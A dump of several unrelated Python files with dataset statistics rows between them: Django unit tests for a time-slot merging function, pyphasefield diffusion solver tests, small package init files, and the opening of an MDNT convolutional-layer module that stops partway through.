Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__author__ = 'rtubiopa@calpoly.edu'
from datetime import timedelta
from django import test
from services.common import misc, slots
class MergeSlotsTest(test.TestCase):
def setUp(self):
self.__verbose_testing = False
def test_merge_none(self):
"""UNIT test: services.common.slots.merge_slots (robustness)
Nones and empties test.
"""
self.assertCountEqual(
[], slots.merge_slots(None, None),
'[] is the expected response to (None, None)'
)
self.assertCountEqual(
[], slots.merge_slots([], []),
'[] is the expected response to ([], [])'
)
def test_merge_case_a(self):
"""UNIT test: services.common.slots.merge_slots (case A)
Case A for merging slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE A')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc(),
misc.get_today_utc() + timedelta(hours=1))
m = (misc.get_today_utc() + timedelta(hours=1),
misc.get_today_utc() + timedelta(hours=4))
expected_s = [p]
actual_s = slots.merge_slots([p], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(expected_s, actual_s, 'CASE A: Wrong result!')
def test_merge_case_b(self):
"""UNIT test: services.common.slots.merge_slots (case B)
Case B for merging slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE B')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc(),
misc.get_today_utc() + timedelta(hours=1, minutes=20))
m = (misc.get_today_utc() + timedelta(hours=1),
misc.get_today_utc() + timedelta(hours=4))
expected_s = [(p[0], m[0])]
actual_s = slots.merge_slots([p], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(expected_s, actual_s, 'CASE B: Wrong result!')
def test_merge_case_c(self):
"""UNIT test: services.common.slots.merge_slots (case C)
Case C for merging slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE C')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc(),
misc.get_today_utc() + timedelta(hours=5))
m = (misc.get_today_utc() + timedelta(hours=1),
misc.get_today_utc() + timedelta(hours=4))
expected_s = [(p[0], m[0]), (m[1], p[1])]
actual_s = slots.merge_slots([p], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(expected_s, actual_s, 'CASE C: Wrong result!')
def test_merge_case_d(self):
"""UNIT test: services.common.slots.merge_slots (case D)
Case D for merging slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE D')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=5))
m = (misc.get_today_utc() + timedelta(hours=1),
misc.get_today_utc() + timedelta(hours=4))
expected_s = [(m[1], p[1])]
actual_s = slots.merge_slots([p], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(expected_s, actual_s, 'CASE D: Wrong result!')
def test_merge_case_e(self):
"""UNIT test: services.common.slots.merge_slots (case E)
Case E for merging slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE E')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
m = (misc.get_today_utc() + timedelta(hours=1),
misc.get_today_utc() + timedelta(hours=4))
expected_s = []
actual_s = slots.merge_slots([p], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(expected_s, actual_s, 'CASE E: Wrong result!')
def test_merge_case_f(self):
"""UNIT test: services.common.slots.merge_slots (case F)
Case F for merging slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE F')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
m = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=1))
expected_s = [p]
actual_s = slots.merge_slots([p], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(expected_s, actual_s, 'CASE F: Wrong result!')
def test_merge_case_no_m_slots(self):
"""UNIT test: services.common.slots.merge_slots (p slots)
Case merging p slots without m slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE NONE M SLOTS')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
q = (misc.get_today_utc() + timedelta(hours=4),
misc.get_today_utc() + timedelta(hours=5))
r = (misc.get_today_utc() + timedelta(hours=6),
misc.get_today_utc() + timedelta(hours=7))
s = (misc.get_today_utc() + timedelta(hours=8),
misc.get_today_utc() + timedelta(hours=9))
expected_s = [p, q, r, s]
actual_s = slots.merge_slots([p, q, r, s], [])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list([], name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(
expected_s, actual_s, 'CASE NONE M: Wrong result!'
)
def test_merge_case_multiple_end(self):
"""UNIT test: services.common.slots.merge_slots (multiple + slots)
Case merging multiple ending (+) slots.
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, CASE MULTIPLE (+)')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
q = (misc.get_today_utc() + timedelta(hours=4),
misc.get_today_utc() + timedelta(hours=5))
r = (misc.get_today_utc() + timedelta(hours=6),
misc.get_today_utc() + timedelta(hours=7))
s = (misc.get_today_utc() + timedelta(hours=8),
misc.get_today_utc() + timedelta(hours=9))
m = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=1))
expected_s = [p, q, r, s]
actual_s = slots.merge_slots([p, q, r, s], [m])
if self.__verbose_testing:
misc.print_list(p, name='(+) slots')
misc.print_list(m, name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(
expected_s, actual_s, 'CASE MULTIPLE: Wrong result!'
)
def test_merge_case_complex_1(self):
"""UNIT test: services.common.slots.merge_slots (complex case #1)
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, COMPLEX CASE #1')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=1))
q = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
r = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=4))
s = (misc.get_today_utc() + timedelta(hours=3),
misc.get_today_utc() + timedelta(hours=5))
m = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=3))
n = (misc.get_today_utc() + timedelta(hours=3, minutes=30),
misc.get_today_utc() + timedelta(hours=4))
expected_s = [(m[1], n[0]), (s[0], n[0]), (n[1], s[1])]
actual_s = slots.merge_slots([p, q, r, s], [m, n])
if self.__verbose_testing:
misc.print_list([p, q, r, s], name='(+) slots')
misc.print_list([m, n], name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(
expected_s, actual_s, 'COMPLEX CASE #1: Wrong result!'
)
def test_merge_case_complex_2(self):
"""UNIT test: services.common.slots.merge_slots (complex case #2)
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, COMPLEX CASE #2')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=1))
q = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
r = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=4))
s = (misc.get_today_utc() + timedelta(hours=3),
misc.get_today_utc() + timedelta(hours=5))
m = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=3))
expected_s = [(m[1], r[1]), s]
actual_s = slots.merge_slots([p, q, r, s], [m])
if self.__verbose_testing:
misc.print_list([p, q, r, s], name='(+) slots')
misc.print_list([m], name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(
expected_s, actual_s, 'COMPLEX CASE #2: Wrong result!'
)
def test_merge_case_complex_3(self):
"""UNIT test: services.common.slots.merge_slots (complex case #3)
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, COMPLEX CASE #3')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=1))
q = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
r = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=4))
s = (misc.get_today_utc() + timedelta(hours=3),
misc.get_today_utc() + timedelta(hours=5))
t = (misc.get_today_utc() + timedelta(hours=6),
misc.get_today_utc() + timedelta(hours=7))
u = (misc.get_today_utc() + timedelta(hours=8),
misc.get_today_utc() + timedelta(hours=9))
v = (misc.get_today_utc() + timedelta(hours=10),
misc.get_today_utc() + timedelta(hours=11))
m = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=3))
n = (misc.get_today_utc() + timedelta(hours=3, minutes=30),
misc.get_today_utc() + timedelta(hours=4))
expected_s = [(m[1], n[0]), (s[0], n[0]), (n[1], s[1]), t, u, v]
actual_s = slots.merge_slots([p, q, r, s, t, u, v], [m, n])
if self.__verbose_testing:
misc.print_list([p, q, r, s], name='(+) slots')
misc.print_list([m, n], name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(
expected_s, actual_s, 'COMPLEX CASE #3: Wrong result!'
)
| 40.051771 | 76 | 0.532621 | 1,768 | 14,699 | 4.19457 | 0.080882 | 0.0774 | 0.132686 | 0.165858 | 0.876079 | 0.860437 | 0.827131 | 0.81486 | 0.798274 | 0.75836 | 0 | 0.012316 | 0.265324 | 14,699 | 366 | 77 | 40.161202 | 0.674414 | 0.105041 | 0 | 0.733068 | 0 | 0 | 0.162198 | 0.075016 | 0 | 0 | 0 | 0 | 0.051793 | 1 | 0.051793 | false | 0 | 0.011952 | 0 | 0.067729 | 0.306773 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
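The cases above pin down the semantics of `slots.merge_slots`: every busy `(-)` slot is subtracted from every availability `(+)` slot, possibly trimming it, splitting it in two, or removing it entirely, while touching endpoints (case A) do not count as overlap. A stand-alone sketch of that interval subtraction (not the library code; plain numbers stand in for the datetime pairs):

```python
def subtract_slots(p_slots, m_slots):
    """Subtract every (-) interval from every (+) interval.

    Intervals are (start, end) pairs with start <= end; any comparable
    type works, so plain numbers stand in for datetimes here.
    """
    result = list(p_slots or [])
    for m0, m1 in (m_slots or []):
        next_result = []
        for p0, p1 in result:
            if m1 <= p0 or m0 >= p1:   # no overlap (touching is fine): keep
                next_result.append((p0, p1))
                continue
            if p0 < m0:                # left remainder survives
                next_result.append((p0, m0))
            if m1 < p1:                # right remainder survives
                next_result.append((m1, p1))
        result = next_result
    return result
```

Each `(+)` slot is processed independently, so overlapping results are not merged with each other, matching the expected lists in the complex cases above.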
799208e279fdc06182f1e5610519857cba2f864a | 712 | py | Python | test.py | MichaelVoelkel/lintly-flake8-github-action-test | 8dcfa4f13dc497565c5837d37f3cd7f51205fef9 | [
"MIT"
] | null | null | null | test.py | MichaelVoelkel/lintly-flake8-github-action-test | 8dcfa4f13dc497565c5837d37f3cd7f51205fef9 | [
"MIT"
] | null | null | null | test.py | MichaelVoelkel/lintly-flake8-github-action-test | 8dcfa4f13dc497565c5837d37f3cd7f51205fef9 | [
"MIT"
] | null | null | null | def foo():
print("this is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too long") | 356 | 701 | 0.800562 | 133 | 712 | 4.285714 | 0.06015 | 0.377193 | 0.957895 | 1.105263 | 0.966667 | 0.966667 | 0.966667 | 0.966667 | 0.966667 | 0.966667 | 0 | 0 | 0.189607 | 712 | 2 | 701 | 356 | 0.987868 | 0 | 0 | 0 | 0 | 0.5 | 0.964937 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 16 |
799da4d9e3f320ac547c86bf23ba846c1534b649 | 138 | py | Python | mp_workshop/__init__.py | mse215/mplectures | 41fb4dc54378fc58899068385e499fe616af38d4 | [
"BSD-3-Clause"
] | null | null | null | mp_workshop/__init__.py | mse215/mplectures | 41fb4dc54378fc58899068385e499fe616af38d4 | [
"BSD-3-Clause"
] | null | null | null | mp_workshop/__init__.py | mse215/mplectures | 41fb4dc54378fc58899068385e499fe616af38d4 | [
"BSD-3-Clause"
] | null | null | null | from crystal_toolkit.helpers.pythreejs_renderer import view
from crystal_toolkit.helpers.pythreejs_renderer import view as display_struct
| 46 | 77 | 0.898551 | 19 | 138 | 6.263158 | 0.578947 | 0.184874 | 0.302521 | 0.420168 | 0.87395 | 0.87395 | 0.87395 | 0.87395 | 0 | 0 | 0 | 0 | 0.072464 | 138 | 2 | 78 | 69 | 0.929688 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 11 |
79b1811bfe8f4b72879d868ca7b99158f1c766ec | 3,761 | py | Python | pyphasefield/tests/test_Diffusion.py | AdditiveModeling/DiffusionTutorial | 973b8f765ef175e1739172faa1573a35af0a3f3e | [
"MIT"
] | 1 | 2022-03-25T08:14:55.000Z | 2022-03-25T08:14:55.000Z | pyphasefield/tests/test_Diffusion.py | AdditiveModeling/DiffusionTutorial | 973b8f765ef175e1739172faa1573a35af0a3f3e | [
"MIT"
] | null | null | null | pyphasefield/tests/test_Diffusion.py | AdditiveModeling/DiffusionTutorial | 973b8f765ef175e1739172faa1573a35af0a3f3e | [
"MIT"
] | 1 | 2020-06-06T14:05:41.000Z | 2020-06-06T14:05:41.000Z | import pyphasefield as ppf
def test_diffusion_default1dexplicit():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10])
sim.simulate(2)
def test_diffusion_default2dexplicit():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10])
sim.simulate(2)
def test_diffusion_default3dexplicit():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10, 10])
sim.simulate(2)
def test_diffusion_Implicit1D():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10], solver="implicit")
sim.simulate(2)
def test_diffusion_Implicit1D_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10], solver="implicit", gmres=True)
sim.simulate(2)
def test_diffusion_Implicit2D():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="implicit")
sim.simulate(2)
def test_diffusion_Implicit2D_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="implicit", gmres=True)
sim.simulate(2)
def test_diffusion_Implicit2D_ADI():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="implicit", adi=True)
sim.simulate(2)
def test_diffusion_Implicit2D_ADI_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="implicit", gmres=True, adi=True)
sim.simulate(2)
def test_diffusion_Implicit3D():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="implicit")
sim.simulate(2)
def test_diffusion_Implicit3D_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="implicit", gmres=True)
sim.simulate(2)
def test_diffusion_Implicit3D_ADI():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="implicit", adi=True)
sim.simulate(2)
def test_diffusion_Implicit3D_ADI_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="implicit", gmres=True, adi=True)
sim.simulate(2)
def test_diffusion_CrankNicolson1D():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10], solver="crank-nicolson")
sim.simulate(2)
def test_diffusion_CrankNicolson1D_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10], solver="crank-nicolson", gmres=True)
sim.simulate(2)
def test_diffusion_CrankNicolson2D():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="crank-nicolson")
sim.simulate(2)
def test_diffusion_CrankNicolson2D_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="crank-nicolson", gmres=True)
sim.simulate(2)
def test_diffusion_CrankNicolson2D_ADI():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="crank-nicolson", adi=True)
sim.simulate(2)
def test_diffusion_CrankNicolson2D_ADI_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="crank-nicolson", gmres=True, adi=True)
sim.simulate(2)
def test_diffusion_CrankNicolson3D():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="crank-nicolson")
sim.simulate(2)
def test_diffusion_CrankNicolson3D_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="crank-nicolson", gmres=True)
sim.simulate(2)
def test_diffusion_CrankNicolson3D_ADI():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="crank-nicolson", adi=True)
sim.simulate(2)
def test_diffusion_CrankNicolson3D_ADI_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="crank-nicolson", gmres=True, adi=True)
sim.simulate(2) | 32.422414 | 84 | 0.691571 | 503 | 3,761 | 4.952286 | 0.059642 | 0.064633 | 0.147732 | 0.184665 | 0.96387 | 0.96387 | 0.96387 | 0.912485 | 0.877961 | 0.787635 | 0 | 0.038792 | 0.163786 | 3,761 | 116 | 85 | 32.422414 | 0.753259 | 0 | 0 | 0.494624 | 0 | 0 | 0.082935 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.247312 | false | 0 | 0.010753 | 0 | 0.258065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
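All of the solvers exercised above advance the diffusion equation u_t = D * u_xx. As a reference for what the default explicit solver computes, here is a minimal forward-Euler step in plain Python (illustrative only, with the usual stability bound D*dt/dx^2 <= 1/2; this is not pyphasefield's implementation):

```python
def diffusion_step_1d(u, D, dt, dx):
    """One explicit forward-Euler step of u_t = D * u_xx with
    zero-flux (Neumann) boundaries, on a plain list of values."""
    r = D * dt / dx**2
    if r > 0.5:  # the explicit scheme is unstable beyond this bound
        raise ValueError("time step too large for explicit scheme")
    # Mirror the edge values to approximate zero-flux boundaries.
    padded = [u[0]] + list(u) + [u[-1]]
    return [u_i + r * (left - 2.0 * u_i + right)
            for left, u_i, right in zip(padded, padded[1:], padded[2:])]
```

The implicit and Crank-Nicolson variants tested above solve a linear system per step instead, which is what the `gmres` and `adi` options select strategies for.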
8dc1e182b7b343cf3b4ba874275e81a2ab0c56ce | 196 | py | Python | drf_jsonpatch/__init__.py | yoann9344/drf_jsonpatch | 5000bb05bce539a4089f8f5cd8ecec6ef6ea05ae | [
"MIT"
] | null | null | null | drf_jsonpatch/__init__.py | yoann9344/drf_jsonpatch | 5000bb05bce539a4089f8f5cd8ecec6ef6ea05ae | [
"MIT"
] | null | null | null | drf_jsonpatch/__init__.py | yoann9344/drf_jsonpatch | 5000bb05bce539a4089f8f5cd8ecec6ef6ea05ae | [
"MIT"
] | null | null | null | from drf_jsonpatch.apply_json_patch import apply_json_patch # noqa: F401
# execute patch
import drf_jsonpatch.patchs.parser # noqa: F401
import drf_jsonpatch.patchs.serialiazers # noqa: F401
| 28 | 73 | 0.811224 | 28 | 196 | 5.428571 | 0.464286 | 0.236842 | 0.184211 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0.127551 | 196 | 6 | 74 | 32.666667 | 0.836257 | 0.234694 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
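The module above re-exports `apply_json_patch`, a helper for applying RFC 6902 JSON Patch documents to DRF data. A toy illustration of what applying such a patch means (top-level keys only; not the package's implementation):

```python
def apply_patch(doc, patch):
    """Apply a tiny subset of RFC 6902 JSON Patch ("add"/"replace"/
    "remove" on top-level keys) to a dict, returning a new dict."""
    result = dict(doc)
    for op in patch:
        key = op["path"].lstrip("/")
        if op["op"] in ("add", "replace"):
            result[key] = op["value"]
        elif op["op"] == "remove":
            del result[key]
        else:
            raise ValueError("unsupported op: %s" % op["op"])
    return result
```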
8dd33df3a323f26fb8cf61c41c5ae50efc776d97 | 157,646 | py | Python | layers/conv.py | cainmagi/MDNT | 4affd8a83698ce6786c04dddacdcf7415f8c5f90 | [
"MIT"
] | 14 | 2019-09-24T07:33:13.000Z | 2021-03-04T16:27:29.000Z | layers/conv.py | cainmagi/MDNT | 4affd8a83698ce6786c04dddacdcf7415f8c5f90 | [
"MIT"
] | 1 | 2020-02-28T04:24:09.000Z | 2020-03-03T08:55:31.000Z | layers/conv.py | cainmagi/MDNT | 4affd8a83698ce6786c04dddacdcf7415f8c5f90 | [
"MIT"
] | 6 | 2020-08-24T03:35:41.000Z | 2021-02-10T08:02:16.000Z | '''
################################################################
# Layers - Modern convolutional layers
# @ Modern Deep Network Toolkits for Tensorflow-Keras
# Yuchen Jin @ cainmagi@gmail.com
# Requirements: (Pay attention to version)
# python 3.6+
# tensorflow r1.13+
# A modern convolutional layer could be written as:
# PRelu ( gamma * [( conv(x, W) - mu ) / sigma ] + beta )
# which indicates that it should contain:
# 1. A convolutional kernel.
# 2. A normalization layer.
# 3. Activation.
# We recommend to use instance normalization and PRelu in most
# cases. This idea is introduced in
# https://arxiv.org/abs/1502.03167v3
# To learn transposed convolution, see
# https://arxiv.org/abs/1603.07285v1
# http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf
# We recommend users to use the new work-flow for transposed
# convolutional layers; if users want to switch back to the old
# Keras style, please set this macro:
# mdnt.layers.conv.NEW_CONV_TRANSPOSE = False
# Here we also implement some tied convolutional layers; note
# that it is necessary to set a name scope when using them in
# multiple models.
# Version: 0.61 # 2019/6/20
# Comments:
# Fix a bug for using bias when set normalization=None in
# AConv.
# Version: 0.60 # 2019/6/12
# Comments:
# Strengthen the compatibility.
# Version: 0.58 # 2019/6/11
# Comments:
# Fix a bug for normalization layers inside AConv when
# channels_first.
# Version: 0.55 # 2019/6/6
# Comments:
# A failed attempt at quick group convolution (QGroupConv);
# moved it to deprecated.
# Version: 0.5 # 2019/6/6
# Comments:
# Enable the advanced convolutional layers (AConv) to support
# group convolution.
# Version: 0.4 # 2019/6/5
# Comments:
# Add group convolutional layers (`GroupConv`).
# Version: 0.35 # 2019/5/28
# Comments:
# 1. Change the order of Cropping layer for AConvTranspose.
# 2. Fix the bug of dilation_rate for AConvTranspose.
# Version: 0.30 # 2019/5/22
# Comments:
# Enhance the transposed convolution to enable it to infer
# the padding/cropping policy from desired output shape.
# Version: 0.23 # 2019/3/30
# Comments:
# Fix a bug when using lrelu without giving configs.
# Version: 0.22 # 2019/3/28
# Comments:
# Enable the transposed convolution to control output-padding
# in both directions.
# Version: 0.21 # 2019/3/27
# Comments:
# Add compatible support and fix a bug about activation.
# Version: 0.20 # 2019/3/26
# Comments:
# Add transposed convolutional layers to this handle.
# Version: 0.10 # 2019/3/25
# Comments:
# Create this submodule.
################################################################
'''
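The formula in the header, `PRelu ( gamma * [( conv(x, W) - mu ) / sigma ] + beta )`, is the normalize-then-activate pipeline applied to the convolution output. A scalar sketch of the post-convolution part makes the role of each parameter explicit (illustrative only; the real layers below operate on tensors channel-wise):

```python
def modern_conv_postprocess(conv_out, mu, sigma, gamma, beta, alpha):
    """Apply normalization statistics (mu, sigma), the learned affine
    parameters (gamma, beta), and a PReLU with negative slope `alpha`
    to a single convolution output value."""
    y = gamma * ((conv_out - mu) / sigma) + beta
    # PReLU: identity for y >= 0, learned slope alpha for y < 0.
    return y if y >= 0.0 else alpha * y
```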
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras import activations
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import constraints
from tensorflow.python.keras import initializers
from tensorflow.python.keras import regularizers
from tensorflow.python.keras.utils import conv_utils
from tensorflow.python.keras.engine.base_layer import Layer
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import variables
from tensorflow.keras.layers import BatchNormalization, LeakyReLU, PReLU
from tensorflow.python.keras.layers.convolutional import Conv, Conv2DTranspose, Conv3DTranspose, UpSampling1D, UpSampling2D, UpSampling3D, ZeroPadding1D, ZeroPadding2D, ZeroPadding3D, Cropping1D, Cropping2D, Cropping3D
from .normalize import InstanceNormalization, GroupNormalization
from .. import compat
if compat.COMPATIBLE_MODE['1.12']:
from tensorflow.python.keras.engine.base_layer import InputSpec
else:
from tensorflow.python.keras.engine.input_spec import InputSpec
NEW_CONV_TRANSPOSE = True
def _get_macro_conv():
